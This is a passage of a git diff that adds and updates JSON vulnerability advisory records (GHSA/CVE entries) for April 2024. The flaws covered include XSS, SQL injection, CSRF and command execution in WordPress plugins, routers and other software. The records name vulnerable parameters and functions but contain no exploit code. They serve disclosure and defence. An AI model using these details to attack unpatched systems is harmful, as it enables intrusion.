inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26098" + }, + { + "type": "WEB", + "url": "https://helpx.adobe.com/security/products/experience-manager/apsb24-21.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T09:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-f993-46p6-8jh9/GHSA-f993-46p6-8jh9.json b/advisories/unreviewed/2024/04/GHSA-f993-46p6-8jh9/GHSA-f993-46p6-8jh9.json new file mode 100644 index 00000000000..7c4065cecb5 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-f993-46p6-8jh9/GHSA-f993-46p6-8jh9.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f993-46p6-8jh9", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-3208" + ], + "details": "The Sydney Toolbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Filterable Gallery widget in all versions up to, and including, 1.28 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3208" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3063343%40sydney-toolbox&new=3063343%40sydney-toolbox&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ccf4554e-4b34-46b0-b423-5cee7150e6c2?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-f9gm-fvch-xf3r/GHSA-f9gm-fvch-xf3r.json b/advisories/unreviewed/2024/04/GHSA-f9gm-fvch-xf3r/GHSA-f9gm-fvch-xf3r.json new file mode 100644 index 00000000000..227d0a1e7d7 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-f9gm-fvch-xf3r/GHSA-f9gm-fvch-xf3r.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f9gm-fvch-xf3r", + "modified": "2024-04-07T18:30:30Z", + "published": "2024-04-07T18:30:30Z", + "aliases": [ + "CVE-2024-31344" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Phpbits Creative Studio Easy Login Styler – White Label Admin Login Page for WordPress allows Stored XSS.This issue affects Easy Login Styler – White Label Admin Login Page for WordPress: from n/a through 1.0.6.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31344" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/easy-login-styler/wordpress-easy-login-styler-plugin-1-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T18:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-f9h9-2656-9px8/GHSA-f9h9-2656-9px8.json b/advisories/unreviewed/2024/04/GHSA-f9h9-2656-9px8/GHSA-f9h9-2656-9px8.json new file mode 100644 index 00000000000..6b550cbaf59 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-f9h9-2656-9px8/GHSA-f9h9-2656-9px8.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f9h9-2656-9px8", + "modified": "2024-04-08T15:30:32Z", + "published": "2024-04-08T15:30:32Z", + "aliases": [ + "CVE-2024-2834" + ], + "details": "A Stored Cross-Site Scripting (XSS) vulnerability has been identified in OpenText ArcSight Management Center and ArcSight Platform. The vulnerability could be remotely exploited.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2834" + }, + { + "type": "WEB", + "url": "https://portal.microfocus.com/s/article/KM000028275" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-fc56-xpwv-3gp9/GHSA-fc56-xpwv-3gp9.json b/advisories/unreviewed/2024/04/GHSA-fc56-xpwv-3gp9/GHSA-fc56-xpwv-3gp9.json new file mode 100644 index 00000000000..c46709960ad --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-fc56-xpwv-3gp9/GHSA-fc56-xpwv-3gp9.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fc56-xpwv-3gp9", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2866" + ], + "details": "The Gutenberg Blocks by Kadence Blocks – Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Advanced Form widget in all versions up to, and including, 3.2.25 due to insufficient input sanitization and output escaping on user supplied attributes such as 'placeholder'. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2866" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3047463%40kadence-blocks&new=3047463%40kadence-blocks&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://research.cleantalk.org/cve-2024-2509" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/dec4a632-e04b-4fdd-86e4-48304b892a4f" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fa984d7f-49b9-49c9-9a1c-9e4c8b7f989b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-fg6v-9r8w-4p8h/GHSA-fg6v-9r8w-4p8h.json b/advisories/unreviewed/2024/04/GHSA-fg6v-9r8w-4p8h/GHSA-fg6v-9r8w-4p8h.json new file mode 100644 index 00000000000..72079a3a537 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-fg6v-9r8w-4p8h/GHSA-fg6v-9r8w-4p8h.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fg6v-9r8w-4p8h", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-3448" + ], + "details": "Users with low privileges can perform certain AJAX actions. In this vulnerability instance, improper access to ajax?action=plugin:focus:checkIframeAvailability leads to a Server-Side Request Forgery by analyzing the error messages returned from the back-end. Allowing an attacker to perform a port scan in the back-end. At the time of publication of the CVE no patch is available.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3448" + }, + { + "type": "WEB", + "url": "https://huntr.com/bounties/4d72d300-92d6-4e3c-93d8-52fe47396ae0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T14:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-fgjr-q739-ggx5/GHSA-fgjr-q739-ggx5.json b/advisories/unreviewed/2024/04/GHSA-fgjr-q739-ggx5/GHSA-fgjr-q739-ggx5.json new file mode 100644 index 00000000000..38e70c5c494 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-fgjr-q739-ggx5/GHSA-fgjr-q739-ggx5.json @@ -0,0 +1,54 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fgjr-q739-ggx5", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2311" + ], + "details": "The Avada theme for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 7.11.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2311" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Xib3rR4dAr/8b0f2bf40092e00851fe2f57f15e947e" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Xib3rR4dAr/af52a553c02936479461189d53c1d4fe" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Xib3rR4dAr/d3c36f7befe7d380ed240d3cb141d64c" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Xib3rR4dAr/ebb7e1dee2b073b8a478c2f663521b30" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ff6ff104-44c8-49a9-bebd-abb82e8e1cd6?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-fgq8-q7cm-9vxf/GHSA-fgq8-q7cm-9vxf.json b/advisories/unreviewed/2024/04/GHSA-fgq8-q7cm-9vxf/GHSA-fgq8-q7cm-9vxf.json new file mode 100644 index 00000000000..81dc2654832 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-fgq8-q7cm-9vxf/GHSA-fgq8-q7cm-9vxf.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fgq8-q7cm-9vxf", + "modified": "2024-04-10T15:30:38Z", + "published": "2024-04-10T15:30:38Z", + "aliases": [ + "CVE-2024-3526" + ], + "details": "A vulnerability has been found in Campcodes Online Event Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file index.php. The manipulation of the argument msg leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259897 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3526" + }, + { + "type": "WEB", + "url": "https://github.com/E1CHO/cve_hub/blob/main/Online%20Event%20Management%20System/Online%20Event%20Management%20System%20-%20vuln%205.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259897" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259897" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312508" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T01:15:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-fhx3-jwgv-mpc2/GHSA-fhx3-jwgv-mpc2.json b/advisories/unreviewed/2024/04/GHSA-fhx3-jwgv-mpc2/GHSA-fhx3-jwgv-mpc2.json index e53eaf046c9..c6ce8527508 100644 --- a/advisories/unreviewed/2024/04/GHSA-fhx3-jwgv-mpc2/GHSA-fhx3-jwgv-mpc2.json +++ b/advisories/unreviewed/2024/04/GHSA-fhx3-jwgv-mpc2/GHSA-fhx3-jwgv-mpc2.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-fhx3-jwgv-mpc2", - "modified": "2024-04-02T15:30:37Z", + "modified": "2024-04-09T00:30:40Z", "published": "2024-04-02T15:30:37Z", "aliases": [ "CVE-2024-30621" ], "details": "Tenda AX1803 v1.0.0.1 contains a stack overflow via the serverName parameter in the function fromAdvSetMacMtuWan.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-787" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-04-02T14:15:08Z" diff --git a/advisories/unreviewed/2024/04/GHSA-fhx3-mxf6-jxpv/GHSA-fhx3-mxf6-jxpv.json b/advisories/unreviewed/2024/04/GHSA-fhx3-mxf6-jxpv/GHSA-fhx3-mxf6-jxpv.json new file mode 100644 index 00000000000..176562ce286 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-fhx3-mxf6-jxpv/GHSA-fhx3-mxf6-jxpv.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fhx3-mxf6-jxpv", + "modified": "2024-04-09T00:30:41Z", + "published": "2024-04-09T00:30:41Z", + "aliases": [ + "CVE-2024-23081" + ], + "details": "ThreeTen Backport v1.6.8 was discovered to contain a NullPointerException via the component org.threeten.bp.LocalDate::compareTo(ChronoLocalDate).", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23081" + }, + { + "type": "WEB", + "url": "https://gist.github.com/LLM4IG/3cc9183dcd887020368a0bafeafec5e3" + }, + { + "type": "WEB", + "url": "https://github.com/ThreeTen/threetenbp" + }, + { + "type": "WEB", + "url": "http://threeten.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T23:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-fj2v-p3c3-xxcr/GHSA-fj2v-p3c3-xxcr.json b/advisories/unreviewed/2024/04/GHSA-fj2v-p3c3-xxcr/GHSA-fj2v-p3c3-xxcr.json new file mode 100644 index 00000000000..cd92ae62337 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-fj2v-p3c3-xxcr/GHSA-fj2v-p3c3-xxcr.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fj2v-p3c3-xxcr", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2093" + ], + "details": "The VK All in One Expansion Unit plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 9.95.0.1 via social meta tags. This makes it possible for unauthenticated attackers to view limited password protected content.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2093" + }, + { + "type": "WEB", + "url": "https://github.com/vektor-inc/vk-all-in-one-expansion-unit/pull/1072" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050823%40vk-all-in-one-expansion-unit&new=3050823%40vk-all-in-one-expansion-unit&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ea2b5dca-42a5-49d4-800d-b268572968a9?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-fjjf-hfph-8mm9/GHSA-fjjf-hfph-8mm9.json b/advisories/unreviewed/2024/04/GHSA-fjjf-hfph-8mm9/GHSA-fjjf-hfph-8mm9.json new file mode 100644 index 00000000000..49431160054 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-fjjf-hfph-8mm9/GHSA-fjjf-hfph-8mm9.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fjjf-hfph-8mm9", + "modified": "2024-04-09T21:31:57Z", + "published": "2024-04-09T21:31:57Z", + "aliases": [ + "CVE-2024-1315" + ], + "details": "The Classified Listing – Classified ads & Business Directory Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0.4. This is due to missing or incorrect nonce validation on the 'rtcl_update_user_account' function. This makes it possible for unauthenticated attackers to change the administrator user's password and email address via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This locks the administrator out of the site and prevents them from resetting their password, while granting the attacker access to their account.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1315" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/classified-listing/tags/3.0.1/app/Controllers/Ajax/PublicUser.php#L445" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/classified-listing/tags/3.0.5/app/Controllers/Ajax/PublicUser.php#L445" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5439651e-5557-4b13-813a-4fc0ad876104?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-fmf7-vf6x-cv7g/GHSA-fmf7-vf6x-cv7g.json b/advisories/unreviewed/2024/04/GHSA-fmf7-vf6x-cv7g/GHSA-fmf7-vf6x-cv7g.json new file mode 100644 index 00000000000..3b2d2dd922c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-fmf7-vf6x-cv7g/GHSA-fmf7-vf6x-cv7g.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fmf7-vf6x-cv7g", + "modified": "2024-04-08T09:31:13Z", + "published": "2024-04-08T09:31:13Z", + "aliases": [ + "CVE-2023-52550" + ], + "details": "Vulnerability of data verification errors in the kernel module.\nImpact: Successful exploitation of this vulnerability may affect service confidentiality.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52550" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/3" + }, + { + "type": "WEB", + "url": "https://https://device.harmonyos.com/en/docs/security/update/security-bulletins-202403-0000001667644725" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T09:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-fphx-r25q-xqhv/GHSA-fphx-r25q-xqhv.json b/advisories/unreviewed/2024/04/GHSA-fphx-r25q-xqhv/GHSA-fphx-r25q-xqhv.json new file mode 100644 index 00000000000..428d94ed557 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-fphx-r25q-xqhv/GHSA-fphx-r25q-xqhv.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fphx-r25q-xqhv", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-30724" + ], + "details": "An issue was discovered in ROS Kinetic Kame in ROS_VERSION 1 and ROS_PYTHON_VERSION 3, allows remote attackers to execute arbitrary code, escalate privileges, obtain sensitive information, and gain unauthorized access to multiple ROS nodes.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30724" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30724" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T04:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-fpvp-qqmr-38cx/GHSA-fpvp-qqmr-38cx.json b/advisories/unreviewed/2024/04/GHSA-fpvp-qqmr-38cx/GHSA-fpvp-qqmr-38cx.json new file mode 100644 index 00000000000..17cef4710d7 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-fpvp-qqmr-38cx/GHSA-fpvp-qqmr-38cx.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fpvp-qqmr-38cx", + "modified": "2024-04-05T21:32:42Z", + "published": "2024-04-05T21:32:42Z", + "aliases": [ + "CVE-2024-27231" + ], + "details": "In tmu_get_tr_stats of tmu.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27231" + }, + { + "type": "WEB", + "url": "https://source.android.com/security/bulletin/pixel/2024-04-01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-fq8c-827p-q5gh/GHSA-fq8c-827p-q5gh.json b/advisories/unreviewed/2024/04/GHSA-fq8c-827p-q5gh/GHSA-fq8c-827p-q5gh.json new file mode 100644 index 00000000000..d372fbb30c4 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-fq8c-827p-q5gh/GHSA-fq8c-827p-q5gh.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fq8c-827p-q5gh", + "modified": "2024-04-09T21:31:58Z", + "published": "2024-04-09T21:31:58Z", + "aliases": [ + "CVE-2024-1792" + ], + "details": "The CMB2 plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.10.1 via deserialization of untrusted input from the text_datetime_timestamp_timezone field. This makes it possible for authenticated attackers, with contributor access or higher, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. Please note that the plugin is a developer toolkit. For the vulnerability to become exploitable, the presence of a metabox activation in your code (via functions.php for example) is required.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1792" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3062907/cmb2/trunk?contextall=1&old=2683046&old_path=%2Fcmb2%2Ftrunk" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c3f37ef5-ddf5-4bd5-b6aa-121dda22fb01?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-fqq4-qr43-h5jq/GHSA-fqq4-qr43-h5jq.json b/advisories/unreviewed/2024/04/GHSA-fqq4-qr43-h5jq/GHSA-fqq4-qr43-h5jq.json new file mode 100644 index 00000000000..7f426c38a97 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-fqq4-qr43-h5jq/GHSA-fqq4-qr43-h5jq.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fqq4-qr43-h5jq", + "modified": "2024-04-09T15:30:37Z", + "published": "2024-04-09T15:30:37Z", + "aliases": [ + "CVE-2023-49133" + ], + "details": "A command execution vulnerability exists in the tddpd enable_test_mode functionality of Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) v5.1.0 Build 20220926 and Tp-Link N300 Wireless Access Point (EAP115 V4) v5.0.4 Build 20220216. A specially crafted series of network requests can lead to arbitrary command execution. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability.This vulnerability impacts `uclited` on the EAP225(V3) 5.1.0 Build 20220926 of the AC1350 Wireless MU-MIMO Gigabit Access Point.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49133" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1862" + }, + { + "type": "WEB", + "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1862" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-829" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T15:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-fqqx-226c-w34m/GHSA-fqqx-226c-w34m.json b/advisories/unreviewed/2024/04/GHSA-fqqx-226c-w34m/GHSA-fqqx-226c-w34m.json new file mode 100644 index 00000000000..10e8af75a40 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-fqqx-226c-w34m/GHSA-fqqx-226c-w34m.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fqqx-226c-w34m", + "modified": "2024-04-05T18:30:34Z", + "published": "2024-04-05T18:30:34Z", + "aliases": [ + "CVE-2024-3347" + ], + "details": "A vulnerability was found in SourceCodester Airline Ticket Reservation System 1.0. It has been rated as critical. This issue affects some unknown processing of the file activate_jet_details_form_handler.php. The manipulation of the argument jet_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259451.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3347" + }, + { + "type": "WEB", + "url": "https://github.com/thisissuperann/Vul/blob/main/Airline-Ticket-Reservation-System-01.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259451" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259451" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.310184" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T16:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-fr43-fjr4-5gq9/GHSA-fr43-fjr4-5gq9.json b/advisories/unreviewed/2024/04/GHSA-fr43-fjr4-5gq9/GHSA-fr43-fjr4-5gq9.json new file mode 100644 index 00000000000..c6a582f603b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-fr43-fjr4-5gq9/GHSA-fr43-fjr4-5gq9.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fr43-fjr4-5gq9", + "modified": "2024-04-07T12:31:03Z", + "published": "2024-04-07T12:31:03Z", + "aliases": [ + "CVE-2024-3418" + ], + "details": "A vulnerability, which was classified as critical, was found in SourceCodester Online Courseware 1.0. Affected is an unknown function of the file admin/deactivateteach.php. The manipulation of the argument selector leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-259590 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": 